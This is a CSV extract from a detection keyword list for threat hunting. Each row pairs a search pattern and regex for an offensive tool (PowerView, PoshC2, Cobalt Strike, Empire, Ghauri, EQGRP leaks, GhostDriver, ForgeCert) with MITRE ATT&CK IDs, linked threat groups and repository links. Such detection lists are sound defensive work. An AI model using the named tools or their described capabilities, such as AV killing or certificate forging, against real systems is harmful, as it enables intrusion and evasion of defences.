"*get-wmiregcachedrdpconnection*",".{0,1000}get\-wmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46348"
"*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46349"
"*getwmireglastloggedon*",".{0,1000}getwmireglastloggedon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46350"
"*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46351"
"*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46352"
"*get-wmireglastloggedon*",".{0,1000}get\-wmireglastloggedon.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46353"
"*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46354"
"*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46355"
"*get-wmiregmounteddrive*",".{0,1000}get\-wmiregmounteddrive.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46356"
"*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46357"
"*Get-WMIRegProxy*",".{0,1000}Get\-WMIRegProxy.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","46358"
"*Get-WorkingHours*",".{0,1000}Get\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46359"
"*gexplorer.exe*",".{0,1000}gexplorer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","46360"
"*ghauri currently only supports DBMS fingerprint payloads for Microsoft Access*",".{0,1000}ghauri\scurrently\sonly\ssupports\sDBMS\sfingerprint\spayloads\sfor\sMicrosoft\sAccess.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46362"
"*Ghauri detected connection errors multiple times*",".{0,1000}Ghauri\sdetected\sconnection\serrors\smultiple\stimes.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46363"
"*Ghauri is expecting database name to enumerate table(s) entries*",".{0,1000}Ghauri\sis\sexpecting\sdatabase\sname\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46364"
"*ghauri -u *",".{0,1000}ghauri\s\-u\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46365"
"*ghauri-*\ghauri-*",".{0,1000}ghauri\-.{0,1000}\\ghauri\-.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46366"
"*ghauri.common.config*",".{0,1000}ghauri\.common\.config.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46367"
"*ghauri.common.lib*",".{0,1000}ghauri\.common\.lib.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46368"
"*ghauri.common.payloads*",".{0,1000}ghauri\.common\.payloads.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46369"
"*ghauri.common.session*",".{0,1000}ghauri\.common\.session.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46370"
"*ghauri.common.utils*",".{0,1000}ghauri\.common\.utils.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46371"
"*ghauri.core.extract*",".{0,1000}ghauri\.core\.extract.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46372"
"*ghauri.core.tests*",".{0,1000}ghauri\.core\.tests.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46373"
"*ghauri.extractor.advance*",".{0,1000}ghauri\.extractor\.advance.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46374"
"*ghauri.py *",".{0,1000}ghauri\.py\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46375"
"*ghauri_extractor*",".{0,1000}ghauri_extractor.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46376"
"*ghauri-main.zip*",".{0,1000}ghauri\-main\.zip.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46377"
"*ghcr.io/picosh/pico/*",".{0,1000}ghcr\.io\/picosh\/pico\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","46381"
"*ghost_* -v*",".{0,1000}ghost_.{0,1000}\s\-v.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46382"
"*ghost_sparc*",".{0,1000}ghost_sparc.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46383"
"*ghost_x86*",".{0,1000}ghost_x86.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46384"
"*ghost01.hwtxt*",".{0,1000}ghost01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46385"
"*GhostDriver.exe *",".{0,1000}GhostDriver\.exe\s.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","46386"
"*GhostDriver-main.zip*",".{0,1000}GhostDriver\-main\.zip.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","46387"
"*GhostInTheNet off*",".{0,1000}GhostInTheNet\soff.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46388"
"*GhostInTheNet on*",".{0,1000}GhostInTheNet\son.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46389"
"*GhostInTheNet.sh *",".{0,1000}GhostInTheNet\.sh\s.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46390"
"*GhostMapper-main.*",".{0,1000}GhostMapper\-main\..{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","46391"
"*GhostPack*",".{0,1000}GhostPack.{0,1000}","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46392"
"*GhostPack/ForgeCert*",".{0,1000}GhostPack\/ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","46393"
